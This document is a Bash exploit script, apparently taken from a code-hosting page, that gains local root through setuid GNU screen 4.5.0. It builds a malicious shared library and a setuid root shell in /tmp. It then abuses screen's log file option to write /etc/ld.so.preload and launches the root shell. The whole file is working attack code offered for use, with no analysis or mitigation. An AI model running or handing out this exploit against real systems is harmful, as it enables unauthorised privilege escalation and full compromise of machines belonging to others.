42 lines
No EOL
1.1 KiB
Bash
Executable file
42 lines
No EOL
1.1 KiB
Bash
Executable file
#!/bin/bash
|
|
# screenroot.sh
|
|
# setuid screen v4.5.0 local root exploit
|
|
# abuses ld.so.preload overwriting to get root.
|
|
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
|
|
# HACK THE PLANET
|
|
# ~ infodox (25/1/2017)
|
|
echo "~ gnu/screenroot ~"
|
|
echo "[+] First, we create our shell and library..."
|
|
cat << EOF > /tmp/libhax.c
|
|
#include <stdio.h>
|
|
#include <sys/types.h>
|
|
#include <unistd.h>
|
|
__attribute__ ((__constructor__))
|
|
void dropshell(void){
|
|
chown("/tmp/rootshell", 0, 0);
|
|
chmod("/tmp/rootshell", 04755);
|
|
unlink("/etc/ld.so.preload");
|
|
printf("[+] done!\n");
|
|
}
|
|
EOF
|
|
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
|
|
rm -f /tmp/libhax.c
|
|
cat << EOF > /tmp/rootshell.c
|
|
#include <stdio.h>
|
|
int main(void){
|
|
setuid(0);
|
|
setgid(0);
|
|
seteuid(0);
|
|
setegid(0);
|
|
execvp("/bin/sh", NULL, NULL);
|
|
}
|
|
EOF
|
|
gcc -o /tmp/rootshell /tmp/rootshell.c
|
|
rm -f /tmp/rootshell.c
|
|
echo "[+] Now we create our /etc/ld.so.preload file..."
|
|
cd /etc
|
|
umask 000 # because
|
|
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
|
|
echo "[+] Triggering..."
|
|
screen -ls # screen itself is setuid, so...
|
|
/tmp/rootshell |